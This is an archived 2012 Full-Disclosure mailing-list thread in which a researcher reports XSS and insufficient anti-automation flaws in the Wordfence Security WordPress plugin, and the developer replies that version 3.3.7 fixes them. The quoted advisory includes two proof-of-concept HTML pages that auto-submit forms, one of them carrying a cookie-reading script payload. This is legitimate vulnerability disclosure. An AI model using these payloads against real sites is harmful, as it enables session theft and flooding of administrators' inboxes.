| lists.openwall.net | lists / announce owl-users owl-dev john-users john-dev passwdqc-users yescrypt popa3d-users / oss-security kernel-hardening musl sabotage tlsify passwords / crypt-dev xvendor / Bugtraq Full-Disclosure linux-kernel linux-netdev linux-ext4 linux-hardening linux-cve-announce PHC | |
|
Open Source and information security mailing list archives
| ||
|
Message-ID: <00eb01cdb3cd$6ff90230$9b7a6fd5@ml> Date: Sat, 27 Oct 2012 01:57:48 +0300 From: "MustLive" <mustlive@...security.com.ua> To: "Mark Maunder" <mmaunder@...il.com> Cc: full-disclosure@...ts.grok.org.uk Subject: Re: XSS and IAA vulnerabilities in Wordfence Security for WordPress Hi Mark! You are welcome. As I see, you've reacted on post to Full-disclosure even faster then on my letter to you (which I've sent you before disclosing to security mailing lists). It is example of the power of Full-disclosure ;-). It's good that you've quickly fixed these holes. But I'm not agree with the way you've fixed IAA vulnerability (at that XSS is fixed correctly, as I've checked). You've wrote in the changelog that you added rate limiting to max of 10 requests per second to the unlock form. But it doesn't protect from spamming. As I've wrote in comment to IAA vulnerability in advisory at my site: "There is no protection (captcha) against automated picking up of admin's e-mail. And if to know admin's e-mail, then by this way it'll be possible to spam him by letters from the site". >>From it you can see, that your fix can't protect from this attack (as captcha could). By sending 10 requests per second with correct e-mail, it'll be possible to overspam admin's e-mail account (so the plugin is still vulnerable to IAA and you need to better fix it). Also there are other vulnerabilities in Wordfence and all of these vulnerabilities concern your web site too. Best wishes & regards, Eugene Dokukin aka MustLive Administrator of Websecurity web site http://websecurity.com.ua ----- Original Message ----- From: Mark Maunder To: MustLive Cc: submissions@...ketstormsecurity.org ; full-disclosure@...ts.grok.org.uk Sent: Friday, October 19, 2012 9:09 PM Subject: Re: [Full-disclosure] XSS and IAA vulnerabilities in Wordfence Security for WordPress This has been fixed and the release just went out. Version 3.3.7. The email param is now escaped and we've added rate limiting to the form with a 3 minute backoff if the limit is exceeded. http://wordpress.org/extend/plugins/wordfence/changelog/ Thanks for your report. Regards, Mark Maunder. On Fri, Oct 19, 2012 at 7:16 PM, MustLive <mustlive@...security.com.ua> wrote: Hello list! I want to warn you about Cross-Site Scripting and Insufficient Anti-automation vulnerabilities in Wordfence Security for WordPress. Wordfence - it's security plugin for WordPress. ------------------------- Affected products: ------------------------- Vulnerable are Wordfence Security 3.3.5 and previous versions. ---------- Details: ---------- XSS (WASC-08): Wordfence Security XSS.html <html> <head> <title>Wordfence Security XSS exploit (C) 2012 MustLive. http://websecurity.com.ua</title> </head> <body onLoad="document.hack.submit()"> <form name="hack" action="http://site/?_wfsf=unlockEmail" method="post"> <input type="hidden" name="email" value="<script>alert(document.cookie)</script>"> </form> </body> </html> Insufficient Anti-automation (WASC-21): Wordfence Security IAA.html <html> <head> <title>Wordfence Security IAA exploit (C) 2012 MustLive. http://websecurity.com.ua</title> </head> <body onLoad="document.hack.submit()"> <form name="hack" action="http://site/?_wfsf=unlockEmail" method="post"> <input type="hidden" name="email" value="admin@...ail.com"> </form> </body> </html> I've informed the plugin developer about vulnerabilities. And mentioned about these vulnerabilities at my site (http://websecurity.com.ua/6106/). Best wishes & regards, MustLive Administrator of Websecurity web site http://websecurity.com.ua -- Mark Maunder <mmaunder@...il.com> France: (+33) 068-700-8029 _______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Powered by blists - more mailing lists